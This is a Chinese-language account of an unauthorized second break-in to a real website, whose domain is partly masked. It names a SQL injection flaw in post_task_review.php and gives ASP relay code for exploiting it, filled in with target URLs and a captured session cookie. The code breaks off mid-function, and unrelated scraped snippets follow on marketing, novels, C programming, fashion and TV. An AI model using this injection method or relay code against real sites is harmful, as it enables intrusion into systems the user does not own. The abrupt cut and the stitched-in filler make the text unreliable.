在这次入侵之前我已经拿到过一次这个网站的shell了,但是被删除了,由于不甘心又拿了一次,才有了下面的过程
一: 踩点 收集信息
因为这个已经是第二次入侵,所以具体的信息我已经基本上掌握
服务器上13个站点,大多数站点很安全,因为之一渗透的时候,是由
http://www.shanXXX.XX 这个站进入的
我这个人比较恋旧,所以第二次也决定由这个站点进行入侵,
由后台看出这个站的程序是RAICO_V1[1].2_CS 如图1
直接从网上down下来,读代码,当然这里的php代码 本人是非常的菜鸟,感谢我的好友jackal,他的脚本是相当的强悍,呵呵
二: 漏洞在哪里?它在灯火阑珊处
这个程序的漏洞文件是在post_task_review.php
由于过滤不严格导致注入,下面我会在文章中详细说明如何利用,
首先在shan这个站注册个用户 并抓取登陆的cookie值,在到本地或者webshell上建立一个注入中转站的文件
内容如下
http://www.shanXXX.XX/post_task_review.php
JmRef=http://www.shanXXX.XX/post_task.php
JmCok=__utma=213560918.3117244849183171600.1213283730.1213293786.1213305387.4; __utmz=213560918.1213283730.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=213560918.21.10.1213305387; __utmc=213560918; PHPSESSID=96b20d4edfe8477cf276aa639bfc31d3
JmStr=URLEncoding(JmStr)
response.write PostData(JMUrl,JmStr,JmCok,JmRef)
Function PostData(PostUrl,PostStr,PostCok,PostRef)
Dim Http
Set Http = Server.CreateObject(msxml2.serverXMLHTTP)
With Http
.Open POST,PostUrl,False
.SetRequestHeader Content-Length,Len(PostStr)
.SetRequestHeader Content-Type,application/x-www-form-urlencoded
.SetRequestHeader Referer,PostRef
.SetRequestHeader Cookie,PostCok
编辑导读:春节期间,百度上线了“好运中国年”的红包勾当。勾当早已竣事,本篇文章从产物设计的角度,对勾当筹谋到执行进程中碰着的问题和一些思考与各人分享,但愿对各人有所辅佐。 作为开年大戏,好运中国年的...
网络小说和传统小说对比而言,最明显的区别就是文笔和意境。 写网络小说,不需要你有多好的文笔,也不需要你有多高的文凭,更不需要你有深厚的文学功底,说白了,小学三年级学生都能写。 一、你得有天马行...
c语言编程用什么软件(适合编写C语言代码的编程软件有哪些?)C语言基本上是大学计算机及其相关专业在大一上学期就会开的一门课程,但是很多学生就是在大一上学期期末的时候很着急,因为自己完全没有学好C语言,...
在社交媒体支配时尚圈风云走向的今天,很多人都在跟着网红穿衣服,且不说跟风购买,撞衫率极高,衣服的做工和设计也是禁不起推敲。所以想要穿搭好品味,还是需要那些独特审美的设计师品牌。 到底什么才是真正的设计...
1941年的列宁格勒,俊俏的苏联女警察及其战友们与德军、间谍、奸细、窃贼的战争,美丽的英国女记者、前苏联白军将军之女的乖舛遭遇,饱受饥饿折磨的苏联军民的生存状态, 列宁格勒_hd.mp4 起飞城市:中...
赵薇《演员请就位2》 演员竞演综艺《演员请就位》第二季临近尾声,本周将要进行决赛前的终极盛典冲...